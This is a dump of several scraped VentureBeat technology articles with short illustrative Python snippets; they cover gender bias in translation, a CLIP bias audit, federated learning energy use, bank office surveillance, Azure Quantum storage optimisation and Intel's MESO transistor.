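FEMININE_ENDINGS = ("simpática", "obrigada")

def tag_pair(source_en, target_pt):
    # Infer gender from the target sentence and prepend a tag token
    # to the source sentence so the model can learn the association.
    last_word = target_pt.split()[-1].rstrip(".")
    tag = "<F>" if last_word in FEMININE_ENDINGS else "<M>"
    return f"{tag} {source_en}", target_pt

print(tag_pair("You are very nice.", "Tu és muito simpática."))
```

At inference time, the user-supplied tag replaces the inferred one, steering the model toward the requested gender.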
If the Hungarian-English system was trained in this way, we could ask it to translate “Ő egy orvos” and receive the translation “She is a doctor,” or “Ő egy nővér” and “He is a nurse.” To perform this at scale, an additional model would need to be trained that classifies the gender of a sentence and uses it to tag the sentences, adding a layer of complexity. While these methods may reduce gender bias in NLP models, they are time-consuming to implement. In addition, they require linguistic information that might not be readily available or possible to get. Thankfully, this topic is becoming a fast-growing area of research. For example, in 2018 Google announced that Google Translate would return translations of single words from four languages to English in both the feminine and masculine form. Researchers from Bloomberg have recently collaborated on best practices for human annotation of language-based models. Many research organizations, like the Brookings Institution, are focused on ways to reduce consumer harms that come from biased algorithms, most recently with voice and chatbots. Everything from hiring practices to loan applications to the criminal justice system can be affected by biased algorithms. Despite these advances, there are more systemic problems that come from a lack of diversity in AI and tech as a whole. Overall, equal gender representation would increase the tech industry’s awareness of bias issues. If AI systems are built by everyone, they would be more unbiased and inclusive of everyone as well. Alon Lavie is VP of Language Technologies at Unbabel. Christine Maroti is AI Research Engineer at Unbabel. 
"
15086
2021
"Audit finds gender and age bias in OpenAI's CLIP model | VentureBeat"
"https://venturebeat.com/2021/08/10/audit-finds-gender-and-age-bias-in-openais-clip-model"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Audit finds gender and age bias in OpenAI’s CLIP model Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. In January, OpenAI released Contrastive Language-Image Pre-training (CLIP) , an AI model trained to recognize a range of visual concepts in images and associate them with their names. CLIP performs quite well on classification tasks — for instance, it can caption an image of a dog “a photo of a dog.” But according to an OpenAI audit conducted with Jack Clark, OpenAI’s former policy director, CLIP is susceptible to biases that could have implications for people who use — and interact with — the model. Prejudices often make their way into the data used to train AI systems, amplifying stereotypes and leading to harmful consequences. 
Research has shown that state-of-the-art image-classifying AI models trained on ImageNet, a popular dataset containing photos scraped from the internet, automatically learn humanlike biases about race, gender, weight, and more. Countless studies have demonstrated that facial recognition is susceptible to bias. It’s even been shown that prejudices can creep into the AI tools used to create art, seeding false perceptions about social, cultural, and political aspects of the past and misconstruing important historical events. Addressing biases in models like CLIP is critical as computer vision makes its way into retail, health care, manufacturing, industrial, and other business segments. The computer vision market is anticipated to be worth $21.17 billion by 2028. But biased systems deployed on cameras to prevent shoplifting, for instance, could misidentify darker-skinned faces more frequently than lighter-skinned faces, leading to false arrests or mistreatment. CLIP and bias As the study’s coauthors explain, CLIP is an AI system that learns visual concepts from natural language supervision. Supervised learning is defined by its use of labeled datasets to train algorithms to classify data and predict outcomes. During the training phase, CLIP is fed labeled datasets that tell it which output is related to each specific input value. The supervised learning process progresses by constantly measuring the resulting outputs and fine-tuning the system to get closer to the target accuracy. CLIP allows developers to specify their own categories for image classification in natural language. 
For example, they might choose to classify images in animal classes like “dog,” “cat,” and “fish.” Then, upon seeing it work well, they might add finer categorization such as “shark” and “haddock.” Customization is one of CLIP’s strengths — but also a potential weakness. Because any developer can define a category to yield some result, a poorly defined class can result in biased outputs. The coauthors carried out an experiment in which CLIP was tasked with classifying 10,000 images from FairFace, a collection of over 100,000 photos showing White, Black, Indian, East Asian, Southeast Asian, Middle Eastern, and Latinx people. With the goal of checking for biases in the model that might harm certain demographic groups, the coauthors added “animal,” “gorilla,” “chimpanzee,” “orangutan,” “thief,” “criminal,” and “suspicious person” to the existing categories in FairFace. The coauthors found that CLIP misclassified 4.9% of the images into one of the non-human categories they added (e.g., “animal,” “gorilla,” “chimpanzee,” “orangutan”). Of these, photos of Black people had the highest misclassification rate at roughly 14%, followed by people 20 years old or younger of all races. Moreover, 16.5% of men and 9.8% of women were misclassified into classes related to crime, like “thief,” “suspicious person,” and “criminal” — with younger people (again, under the age of 20) more likely to fall under crime-related classes (18%) compared with people in other age ranges (12% for people aged 20-60 and 0% for people over 70). In subsequent tests, the coauthors tested CLIP on photos of female and male members of the U.S. Congress. At a higher confidence threshold, CLIP labeled people “lawmaker” and “legislator” across genders. But at lower thresholds, terms like “nanny” and “housekeeper” began appearing for women and “prisoner” and “mobster” for men. 
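Per-group figures like the 4.9% and 14% rates above come from simple aggregation over audit predictions. A sketch with invented records (the real audit ran over roughly 10,000 FairFace images):

```python
from collections import defaultdict

# Labels the audit treated as non-human misclassifications.
NON_HUMAN = {"animal", "gorilla", "chimpanzee", "orangutan"}

# Hypothetical audit records: (demographic group, predicted label).
records = [
    ("Black", "animal"), ("Black", "lawmaker"), ("Black", "legislator"),
    ("White", "doctor"), ("White", "animal"), ("White", "teacher"),
]

def misclassification_rates(records):
    # Count, per group, how many predictions fell into a non-human class.
    totals, errors = defaultdict(int), defaultdict(int)
    for group, label in records:
        totals[group] += 1
        if label in NON_HUMAN:
            errors[group] += 1
    return {g: errors[g] / totals[g] for g in totals}

print(misclassification_rates(records))
```

Comparing these rates across groups, rather than reporting a single overall accuracy, is what surfaces the disparities the audit describes.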
CLIP also disproportionately attached labels to do with hair and appearance to women, for example “brown hair” and “blonde.” And the model almost exclusively associated “high-status” occupation labels with men, like “executive,” “doctor,” and “military person.” Paths forward The coauthors say their analysis shows that CLIP inherits many gender biases, raising questions about what sufficiently safe behavior may look like for such models. “When sending models into deployment, simply calling the model that achieves higher accuracy on a chosen capability evaluation a ‘better’ model is inaccurate — and potentially dangerously so. We need to expand our definitions of ‘better’ models to also include their possible downstream impacts, uses, [and more],” they wrote. In their report, the coauthors recommend “community exploration” to further characterize models like CLIP and develop evaluations to assess their capabilities, biases, and potential for misuse. This could help increase the likelihood models are used beneficially and shed light on the gap between models with superior performance and those with benefit, the coauthors say. “These results add evidence to the growing body of work calling for a change in the notion of a ‘better’ model — to move beyond simply looking at higher accuracy at task-oriented capability evaluations and toward a broader ‘better’ that takes into account deployment-critical features, such as different use contexts and people who interact with the model, when thinking about model deployment,” the report reads. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. 
VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,087
2,021
"Proposed framework could reduce energy consumption of federated learning | VentureBeat"
"https://venturebeat.com/2021/02/23/proposed-framework-could-reduce-energy-consumption-of-federated-learning"
"Proposed framework could reduce energy consumption of federated learning Modern machine learning systems consume massive amounts of energy. In fact, it’s estimated that training a large model can generate as much carbon dioxide as the total lifetime emissions of five cars. The impact could worsen with the emergence of machine learning in distributed and federated learning settings, where billions of devices are expected to train machine learning models on a regular basis. In an effort to lessen the impact, researchers at the University of California, Riverside and Ohio State University developed a federated learning framework optimized for networks with severe power constraints. They claim it’s both scalable and practical in that it can be applied to a range of machine learning settings in networked environments, and that it delivers “significant” performance improvements. 
The effects of AI and machine learning model training on the environment are increasingly coming to light. Ex-Google AI ethicist Timnit Gebru recently coauthored a paper on large language models that discussed urgent risks, including carbon footprint. And in June 2020, researchers at the University of Massachusetts at Amherst released a report estimating that the amount of power required for training and searching a certain model produces roughly 626,000 pounds of carbon dioxide, equivalent to nearly 5 times the lifetime emissions of the average U.S. car. In machine learning, federated learning entails training algorithms across client devices that hold data samples without exchanging those samples. A centralized server might be used to orchestrate rounds of training for the algorithm and act as a reference clock, or the arrangement might be peer-to-peer. Regardless, local algorithms are trained on local data samples and the weights — the learnable parameters of the algorithms — are exchanged between the algorithms at some frequency to generate a global model. Preliminary studies have shown this setup can lead to lowered carbon emissions compared with traditional learning. In designing their framework, the researchers of this new paper assumed that clients have intermittent power and can participate in the training process only when they have power available. Their solution consists of three components: (1) client scheduling, (2) local training at the clients, and (3) model updates at the server. Client scheduling is performed locally such that each client decides whether to participate in training based on an estimation of available power. During the local training phase, clients that choose to participate in training update the global model using their local datasets and send their updates to the server. 
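The three components map naturally onto a simulation loop. Here is a toy sketch of one training round, assuming a scalar model fit to each client’s local data by least squares; the client fields and update rule are illustrative, not the paper’s actual formulation.

```python
def federated_round(global_model, clients, lr=0.1):
    """One round of the three-phase loop: (1) client-side scheduling,
    (2) local training at participating clients, (3) server averaging."""
    local_models = []
    for client in clients:
        # (1) scheduling: each client decides locally, from its own power
        # estimate, whether it can afford to train this round
        if client["available_power"] < client["power_needed"]:
            continue
        # (2) local training: one gradient step of a scalar least-squares fit
        grad = sum(2.0 * (global_model - x) for x in client["data"]) / len(client["data"])
        local_models.append(global_model - lr * grad)
    # (3) server update: average whatever local models arrived
    return sum(local_models) / len(local_models) if local_models else global_model
```

A client whose estimated power falls below its threshold simply sits a round out, which is the behavior the framework is built around.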
Upon receiving the local updates, the server updates the global model for the next round of training. Across several experiments, the researchers compared the performance of their framework with benchmark conventional federated learning settings. The first benchmark was a scenario in which federated learning clients participated in training as soon as they had enough power. The second benchmark, meanwhile, dealt with a server that waited for clients to have enough power to participate in training before initiating a training round. The researchers claim that their framework significantly outperformed the two benchmarks in terms of accuracy. They hope it serves as a first step toward sustainable federated learning techniques and opens up research directions in building large-scale machine learning training systems with minimal environmental footprints. "
15,088
2,021
"As employees return to the office, banks explore surveillance tech | VentureBeat"
"https://venturebeat.com/2021/05/21/banks-explore-sensors-cameras-monitoring-tech-as-workers-return-to-office"
"As employees return to the office, banks explore surveillance tech VergeSense's office with sensors installed. ( Reuters ) — Reservation systems for seats. Algorithms that say whether a location is crowded or not. Cameras to show what’s happening in real-time. Trackers that let others know you are there. Technology that has swept the world for convenience, curiosity, and accountability is arriving at workstations of U.S. bank employees, as they prepare to return to offices in coming months because of the pandemic easing, industry sources and outside vendors said. Banks including JPMorgan Chase , Goldman Sachs Group, Citigroup, Deutsche Bank AG and HSBC Holdings plan to have workers commute to buildings in New York and other U.S. cities as soon as this month, after more than a year of largely work-from-home situations. 
But not everyone can return at once: banks will have to extend practices like those used for small teams of traders during the pandemic. Shifting rotations of people will pass through giant buildings on different days, without clustering in the same areas on the same floors, to avoid spreading COVID-19. Some of the banks are implementing systems where employees will book “hot seats” on particular days and be monitored while they are sitting at them, sources said. In some buildings, that could mean cameras that monitor a room’s occupancy level and even sensors that tell building management whether someone is sitting at a desk. “That feels a little personal,” one bank employee said about desk sensors. The comment reflects a sentiment that some banks could face as they bring in tech that monitors employees more closely after an unprecedented period of working from afar: they are okay booking dinner reservations online, sharing locations with friends, live-streaming videos or wearing activity trackers for their own health, but not necessarily okay with their employers knowing when they are seated at a desk. Employees will need to get over these hang-ups because the technology is necessary for safety and saves companies money, industry sources and consultants said. “We have to be more mindful about how space is being used and when it is being used,” said Neil Murray, CEO of corporate solutions at JLL, which manages offices for JPMorgan, Morgan Stanley, Goldman Sachs and others. Murray said public health initiatives like contact-tracing have forced us to make certain concessions. “There is an element of having to watch interactions more closely. At the same time, we have to be respectful of individual privacy.” JLL would not comment on specific clients, and Reuters could not independently determine which banks were using the technology. 
Searching for ‘optimum rotation’ Staff returning to JPMorgan’s Manhattan headquarters will soon have a new app that uses algorithms and artificial intelligence to book seats. It is part of an “optimum rotation” plan, Daniel Pinto, JPMorgan’s co-president and chief operating officer said recently. That means getting the right people together on the right days for in-office collaboration. HSBC and Deutsche Bank also plan to launch reservation apps and online systems. While all three banks are still working out the details, apps like these can use card-swipes at security turnstiles to identify patterns and suggest when someone should book a desk to meet teammates. Some companies in JLL’s portfolio are taking it a step further and linking their reservation systems to building cameras, which count bodies in a room, and desk sensors, which record when a seat is occupied, Murray said. In addition to flagging when a room may be near its 50% capacity limit, the data can tell companies when an office, or whole floor, is empty. That helps determine when to turn off lights, cancel janitorial services or downsize office space. JPMorgan expects to need just 60 seats for every 100 employees, on average, Chief Executive Jamie Dimon wrote in his April shareholder letter. “This will significantly reduce our need for real estate,” Dimon wrote. What about lunch? A not insignificant number of bank employees have resisted going back to work in the office — whether because of COVID-19 concerns, because they moved out of big cities during the pandemic, or because they simply prefer more flexible work arrangements. On the flip side, some junior investment bankers have complained about working from home without the hands-on guidance and camaraderie they would get in person, and without perks like free meals for late-night duties. Banks will have to balance those dynamics to get their workforce back to the office, and some are leaning on the idea of free and subsidized food. 
Credit Suisse, Barclays and others are using Sharebite, which coordinates orders from restaurants and directs delivery drivers to a building’s service entrance. Meals are then sent to a common space where employees collect them. The service has been popular at investment banks looking for contactless food delivery, said Sharebite CEO Dilip Rao. “When you offer people food it brings people back to the office,” Rao said. “They feel safe. They feel fed.” "
15,089
2,021
"Azure Quantum drives data storage improvements | VentureBeat"
"https://venturebeat.com/2021/11/15/azure-quantum-drives-data-storage-improvements"
"Azure Quantum drives data storage improvements As organizations continue to struggle to maximize storage utilization and optimize the analysis of massive amounts of data, Microsoft is upping its focus on the “high promise of quantum technology,” Daniel Stocker, program manager, Azure Quantum technology, told VentureBeat. With those data sizes growing and complexity increasing, Azure Quantum built a quantum-inspired optimization (QIO) solution for Azure Storage that’s designed to keep the load on storage clusters uniform while reducing the amount of data that needs to move. [ Related : Multiverse Computing utilizes quantum tools for finance apps ] Azure Quantum has been supporting the Azure Storage team this year with a quantum-inspired optimization solution, according to Microsoft. Stocker said “quantum-inspired” refers to running quantum algorithms on classical systems while allowing developers to be prepared for further acceleration when “scaled quantum hardware is available at scale. We’re not there yet,” he said. 
Moving data intelligently The quantum solution has helped the Azure Storage team increase capacity, efficiency, and predictability, which helps customers get high-quality service from Azure Storage. “We optimize every move we make, and we make them intelligently,” Stocker said. [ Related : Gartner advises tech leaders to prepare for action as quantum computing spreads ] Stocker said Azure offerings are available for both quantum-inspired and quantum hardware systems on a pay-as-you-go model. Developers can use Python or Microsoft Q#, Microsoft’s open-source language for developing quantum algorithms. Python is the language of choice for developing quantum algorithms, while Q#, Stocker said, will “future-proof Azure Storage long-term.” Microsoft points to three customers that it says have seen significant results from Azure Quantum. Trimble uses Azure Quantum to find the most efficient routes for a fleet of vehicles, looking to ensure fewer trucks run empty and maximizing their operating load for each trip. OTI Lumionics is accelerating materials design with quantum-inspired optimization solutions designed to simulate organic materials used in OLED displays for the design of next generation consumer electronics. Ford partnered with Azure Quantum to build a QIO-based traffic optimization solution that’s designed to reduce both traffic congestion and travel time by delivering optimized routing to thousands of drivers simultaneously. Preliminary studies show more than a 70 percent decrease in congestion, as well as an 8 percent reduction of average travel time, according to the automaker. 
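Microsoft has not published the internals of the Azure Storage solver, but quantum-inspired optimization generally means minimizing a cost function with classical heuristics such as simulated annealing. The sketch below is a hypothetical illustration of the trade-off described above — uniform cluster load versus minimal data movement — and is not Azure Quantum’s actual QIO API.

```python
import math
import random

def rebalance(shard_sizes, assignment, n_clusters, moves_weight=1.0,
              steps=5000, seed=0):
    """Simulated-annealing stand-in for a QIO solver. The cost function is
    load imbalance across clusters plus a penalty per shard moved away
    from its current cluster."""
    rng = random.Random(seed)

    def cost(assign):
        loads = [0.0] * n_clusters
        for size, cluster in zip(shard_sizes, assign):
            loads[cluster] += size
        imbalance = max(loads) - min(loads)
        moves = sum(a != b for a, b in zip(assign, assignment))
        return imbalance + moves_weight * moves

    current = list(assignment)
    best, best_cost = list(current), cost(current)
    for step in range(steps):
        temp = max(1e-3, 1.0 - step / steps)  # cooling schedule
        cand = list(current)
        cand[rng.randrange(len(cand))] = rng.randrange(n_clusters)
        delta = cost(cand) - cost(current)
        # accept improvements always, worse moves with Boltzmann probability
        if delta < 0 or rng.random() < math.exp(-delta / temp):
            current = cand
            if cost(current) < best_cost:
                best, best_cost = list(current), cost(current)
    return best
```

Raising `moves_weight` biases the solver toward leaving data in place, which mirrors the stated goal of keeping load uniform while reducing the amount of data that needs to move.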
"
15,090
2,022
"Intel looks beyond CMOS to MESO | VentureBeat"
"https://venturebeat.com/2022/01/14/intel-looks-beyond-cmos-to-meso"
"Intel looks beyond CMOS to MESO At the 2021 IEEE International Electron Devices Meeting (IEDM), Intel demonstrated for the first time a functional MESO (Magneto-Electric Spin-Orbit) transistor. MESO is what’s called a “beyond-CMOS” device. That is, it represents a fundamental new way of building a transistor (and hence computers) and uses room-temperature quantum materials. MESO could be 10 to 30 times more efficient than existing transistors and could help spur AI efforts across a variety of industries. Although still in the research phase, MESO would represent the biggest advance in computing since the introduction of the transistor, if it reaches commercialization, and would likely lead to revisions in electrical engineering courses and textbooks. 
Intel’s prior theoretical research had shown that MESO could offer significant advances over conventional transistors in energy consumption and chip area. MESO could allow circuits to run at just 100mV, and would be especially promising for application in AI chips. In the more recent demonstration, Intel showed the potential of the new transistor. In 2021, Intel laid out its process roadmap through 2025, which it will also use to build its new Intel Foundry Service business. Most noteworthy from that roadmap is that, in 2024, Intel will make another big (but more evolutionary) change to the transistor with the introduction of RibbonFET and PowerVia. Although MESO remains a future technology, it’s significant because it’s the first transistor (out of dozens of alternatives that have been researched) that may be capable of replacing – or at least augmenting – conventional semiconductors. The next few sections will dive into the physics behind MESO. The limits of CMOS Although computing existed well before the invention of transistors (through devices such as vacuum tubes), it’s only been since the transistor that computing has started to advance exponentially. The continued miniaturization of these devices has led to a trend widely known as Moore’s Law. Besides the fact that transistors lend themselves to scaling, what fundamentally makes them so successful is that they provide circuit designers with an on-off switch that also provides a gain. Furthermore, transistor fabrication is based on silicon, which is a semiconductor whose properties can be controlled through doping. That is, its conductivity can be precisely determined by inserting (doping) silicon with impurities. 
Through the years, especially as the transistor started to enter nanoscale dimensions, it has already seen many enhancements to improve speed, or to reduce power consumption or leakage. One of the biggest of these improvements was to change the transistor from a planar device to a 3D FinFET (where the fin extends out of the initial silicon wafer). In the next several years, this structure will be further improved by the gate-all-around transistor, which goes by various names such as the RibbonFET (Intel) or MBCFET (Samsung). However, despite these changes, the architecture of a MOSFET has fundamentally remained the same: the current through the channel of the transistor is controlled by applying a voltage to the gate. The gate itself is insulated from the conducting channel, so current only flows from input to output. The input and output contacts are known as the source and drain. Over time, various alternative structures have been proposed. These seek to accomplish the same on-off switch characteristics as a MOSFET, but based on other physical properties and mechanisms. From that view, the MOSFET can be classified as a charge-based, electronic device: its working is based on electronic (electrostatic) properties. Also in the charge-based category, another device that has been researched is the tunnel FET, which uses the quantum mechanical property of tunneling. Other device types include orbitronics, magneto-electronics, and spintronics. Are these kinds of devices just curiosities for physicists and engineers to research, or are some of them capable of replacing silicon in high-volume manufacturing? The answer lies in the fundamental working principles of semiconductors, which impose a fundamental limit. Remember that for an on-off switch to function properly, one needs to obtain a significant difference in current between the on- and off-states. As mentioned above, this is controlled by applying a voltage to the gate. 
However, the current through a transistor doesn’t change arbitrarily when a voltage is applied. Ultimately, a semiconductor is limited by the laws of statistics and thermodynamics: given the thermal energy available to electrons at room temperature, there is a fundamental limit to how much the current through a transistor can decrease as the voltage is decreased. More specifically, the laws of thermodynamics impose a distribution in the energy available to electrons at a given temperature (since temperature by definition refers only to their average energy). The “tail” of this distribution decays exponentially. So when the transistor is turned off (reducing the voltage below the threshold), current will decrease exponentially as voltage is decreased. Crucially, the exact rate of this decay also depends on temperature. This property is known as the subthreshold slope, and it’s expressed in terms of how many millivolts are required to increase or decrease the current by 10x. (The exact limit is ~60mV/dec, as it turns out.) It’s this slope that determines the minimum operating voltage of a transistor. A transistor with a steeper slope would be able to operate at a lower voltage, which would reduce its power consumption and thus result in a higher energy efficiency and speed. But since this slope is purely determined by thermodynamics, the only way to make the slope steeper would be to decrease the temperature, which of course is unfeasible. This limitation is also known as the Boltzmann tyranny. Because the switching characteristics of a conventional CMOS device are determined (and limited) by fundamental physics, the only way to possibly circumvent this barrier is to look for devices that operate based on different physical mechanisms. This is where the appeal for beyond-CMOS devices comes from. Although a large number of alternatives to the conventional transistor have been proposed, decades of R&D have made silicon a tough material to beat. 
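The ~60mV/dec figure follows directly from Boltzmann statistics: the thermionic limit on the subthreshold slope is (kT/q)·ln(10). A quick check:

```python
import math

# Boltzmann constant (J/K) and elementary charge (C), exact SI values
K_B = 1.380649e-23
Q_E = 1.602176634e-19

def subthreshold_limit_mv_per_decade(temp_kelvin):
    """Thermionic limit on the subthreshold slope: (kT/q) * ln(10),
    i.e., the minimum gate-voltage change for a 10x change in current."""
    return (K_B * temp_kelvin / Q_E) * math.log(10) * 1000.0
```

At 300 K this yields ~59.5 mV/dec, the ~60mV/dec floor cited above; at 77 K (liquid nitrogen) it would drop to ~15 mV/dec, which is exactly why lowering the temperature is the only "fix" available within conventional thermodynamics.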
In a landmark research paper in 2017, Intel benchmarked about two dozen beyond-CMOS devices. As can be seen from the summary graph, hardly any device is faster than HP CMOS, and just a few are lower power than LP CMOS. But overall, there didn’t seem to be any one candidate that is both faster and at a lower power. Without substantial improvements over CMOS, it is doubtful that it would be worthwhile to spend billions of dollars of R&D to make such a new switch suitable for high-volume manufacturing, as other issues such as cost might also come into play. So given the versatility of CMOS and regular semiconductors from low power to high performance, and from analog to RF to high voltage to digital, it is unlikely that current CMOS technology will ever be fully replaced. Rather, a new technology would perhaps be integrated in combination with CMOS so that it could be used only for the circuits in a system where it delivers a real benefit. How MESO goes beyond CMOS More recently, a new kind of device (MESO) has emerged, invented by Intel and proposed in a 2018 paper. Intel claimed it has the potential to deliver substantial benefits compared to CMOS. Since it would operate at just 100mV, it could result in 10 to 30 times higher efficiency. Intel further claimed it could improve logic density by 5x. The MESO device is also non-volatile (which means its state is conserved when power is turned off) and has spintronic properties, which means new kinds of circuits could be implemented, suitable for AI. “MESO is like a transistor – input voltage controls the current at the output (so it is electrical voltage in and current out like MOSFETs, but it switches at [approximately] 10x lower voltage than a MOSFET,” according to Intel. 
“Thus, wires only have to swing 10X lower voltage – this saves power.” However, while similar to a transistor, the architecture and physics of the MESO transistor completely differs from conventional semiconductors, as it makes heavy use of quantum effects and materials. Referring to the beyond-CMOS classification above, MESO makes use of no less than three classes of information carriers: electronics, magneto-electronics, and spintronics. However, perhaps the most elegant aspect about MESO is that all complexity is restricted to the device itself: Information comes into the device through a conventional charge-based interconnect, and at the end leaves the device again as an electrical current. In the device itself, the charge is first converted to magnetism using the magneto-electric effect, and then converted back to charge using the spin-orbit effect. The device and information flow is shown in the image below. In more detail, the device architecture works as follows. The input is a ferroelectric capacitor that is connected to a regular charge-based interconnect. Ferroelectric materials are materials whose magnetic properties can be controlled through applied voltages, which explains how charge is converted to magnetism. (Analogously, in an electric motor, ferromagnetic materials can be used to convert current into motion through magnetism.) This ferroelectric material in turn controls a nanomagnet or ferromagnet, which will point north or south depending on its input. Although this nanomagnet represents the output state of the transistor, it still has to be converted back to a current. This is achieved through a quantum effect called a spin-orbit interaction, or, more specifically, the inverse Rashba-Edelstein effect. In general, a spin-orbit interaction refers to the interaction of an electron with a magnetic field (recall from quantum physics that an electron has an intrinsic magnetic moment called its spin). 
A more technical description is that it is “a relativistic interaction of a particle’s spin with its motion inside a potential”. The Rashba-Edelstein effect is a mechanism to convert charge to spin, so the inverse effect accomplishes the desired conversion from spin to charge. As a current (Isupply in the image above) is sent through the nanomagnet, due to the inverse Rashba-Edelstein effect, the output will be a positive or negative current depending on the direction of the nanomagnet. The switching property is obtained since the nanomagnet has a thresholding property: an input voltage controls the nanomagnet (through the ferroelectric material), which will point either north or south, which will then result in either a positive or a negative output current. To make circuits with these devices then simply becomes a matter of connecting the output of one device to the input of the next device. For example, a positive output current in the first device would charge the ferroelectric input capacitor of the second device, while a negative current would discharge it. Interestingly, the thresholding property can also be used to build “majority gates” by using multiple voltages as input. As the name implies, a majority gate will output a 1 if the majority of its inputs is a 1. This is likely why Intel claimed the 5x density improvement: from the study of the broader field of spintronics it has long been known that circuits built using majority gates could be much smaller (require far fewer transistors) than conventional CMOS circuits. In summary, the input charge is converted to a magnetic “signal” through the ferroelectric material, which controls a nanomagnet. This nanomagnet in turn will determine the output charge based on a quantum effect that converts spin (induced by the nanomagnet) into charge. 
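The thresholding behavior described above can be captured in a few lines. This is a purely illustrative toy model — a real MESO device is an analog physical system, not a Python function:

```python
def meso_output(input_charge, supply_current=1.0):
    """Toy model of one MESO device: the sign of the accumulated input
    charge sets the nanomagnet direction (thresholding), and the spin-orbit
    read-out converts that direction into a signed output current."""
    magnet = 1 if input_charge > 0 else -1  # magnetoelectric "write"
    return magnet * supply_current          # inverse Rashba-Edelstein "read"

def majority_gate(*input_currents):
    """Summing several device outputs onto one input capacitor gives a
    majority vote: the magnet flips with the sign of the sum."""
    return meso_output(sum(input_currents))
```

Chaining works the same way: the signed output current of one device charges or discharges the input capacitor of the next.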
In the analogy with an electric motor, it is as if the input current controls the motor, which at the same time is used as a generator to convert the motion back into electricity (as in a wind turbine).

The room-temperature quantum materials, which Intel highlighted in 2018 as the main hurdles toward the physical realization of this device, are “correlated oxides” and “topological states of matter.” In the broader context of beyond-CMOS devices, since traditional electronics are based on charge instead of spin/magnetism, MESO solves the fundamental readout problem by converting back to charge at the output. From the 2018 paper: “The discovery of strong spin–charge coupling in topological matter via a Rashba–Edelstein or topological two-dimensional electron gas enables this proposal for a charge-driven, scalable logic computing device.” For comparison, in traditional spintronics the spin signal, for example, decays exponentially along an interconnect. In more technical terms, the use of spin for the transistor is referred to as a “collective state switch” whose output depends on a “collective order parameter” that can take two values (plus or minus theta), which in practice just means the spin is up or down. Since there are two possible outputs, this is indeed a switch, but the different mechanism it uses (based on the order parameter) overcomes the Boltzmann tyranny that plagues traditional electronics.

The graph above shows Intel’s benchmark results (based on simulation) from 2018 for a 32-bit ALU. MESO achieved higher throughput density (TOPS per cm2) at a much lower power density than both CMOS HP and LV. 
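Energy comparisons like these hinge on unit conversions between throughput-per-watt and energy per operation. As a sanity check on the figures quoted in this article (a ~10 TOPS/W NPU versus Intel's 1 aJ/bit MESO target), the arithmetic works out as follows:

```python
# Sanity-check the energy-per-bit figures quoted in the article.
# An NPU delivering 10 TOPS/W spends (1 W) / (10e12 ops/s) per operation:
tops_per_watt = 10
energy_per_op_j = 1 / (tops_per_watt * 1e12)  # joules per op: 1e-13 J = 100 fJ

# The article's "roughly 10 fJ/bit" corresponds to ~10 bits per INT8 op:
energy_per_bit_j = energy_per_op_j / 10       # 1e-14 J = 10 fJ per bit

# MESO's stated target is 1 aJ/bit = 1e-18 J, four orders of magnitude lower:
meso_target_j = 1e-18
print(energy_per_bit_j / meso_target_j)
```

This gap between today's circuit-level efficiency and the device-level target is why the chip-scale numbers, as the article notes, remain to be seen.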
Besides the lower operating voltage, Intel indicated that the different transistor architecture also allows for improvements in the interconnect, with resistance and capacitance requirements that are up to 100x “less stringent than conventional interconnects,” which in turn would reduce interconnect power by 10x. This might also contribute to MESO’s efficiency, since interconnects in modern chips can consume over 50% of the total power. Furthermore, Intel has demonstrated that the MESO device characteristics improve as the device is scaled further down (following a cubic trend), and MESO also promises integration and compatibility with CMOS.

Intel’s original paper included various target specifications to reach a 1aJ/bit device. Intel claims this is 30x lower than CMOS, which seems in the ballpark given that another source provides a lower limit of ~144aJ/bit in older 45nm process technology. Although 1aJ/bit was given as the target, estimates ranging from 0.1 to 10 aJ/bit were also mentioned further in the paper. How these device specifications would translate into chip-scale specifications, with circuits running at perhaps GHz-scale frequencies (if that is even feasible with MESO), remains to be seen. For comparison, state-of-the-art commercial NPUs (neural processing units) achieve up to 10 TOPS/W at INT8 precision, which translates into 100 fJ/instruction, or roughly 10 fJ/bit. This implies the circuit level is ~100x less efficient than a single inverter at its most efficient voltage-frequency operating point.

Applications in AI

In an interview with VentureBeat in 2019, Intel identified AI, in particular, as a promising application for the MESO device, rather than CPUs. This is based on a few reasons. First, given the low operating voltage of the MESO device, it may not match the high frequencies of CMOS circuits. 
Rather, MESO might be most suitable for applications such as AI and graphics that rely on highly parallel operations that individually run at a lower speed than a CPU. Secondly, AI can make use of MESO’s different switching properties. Deep learning, in particular, is suited to the majority gates that can be made with MESO. So by designing circuits to take advantage of majority gates, neural networks could be implemented with far fewer transistors: “Majority gates is the next door neighbor to the neuron. Deep neural networks is about neurons and weights. We’ve found that this MESO technology and things that can do majority gates is very attractive in AI,” Intel said. “With the MESO magnet, multiple inputs can be brought in through a ‘majority gate,’ or thresholding gate. This is analogous to how neural networks use weights to represent the influence of nodes.”

There could also be a more practical reason: “CPUs, which are the most commonplace when you’re building silicon, are oddly enough the hardest thing to build,” Amir Khosrowshahi, VP of Intel, said in the interview with VentureBeat. “But in AI, it’s a simpler architecture. AI has regular patterns, it’s mostly compute and interconnect, and memories. Also, neural networks are very tolerant to inhomogeneities in the substrate itself. So I feel this type of technology will be adopted sooner than expected in the AI space. By 2025, it’s going to be the biggest thing.”

Timeline for MESO

As for the commercialization of MESO, the 2025 timeline might be ambitious given how many challenges are involved in bringing a fundamentally new technology into production. For example, even improvements to standard transistors have often taken over a decade to reach production. Based on the discussion above, there are two options. 
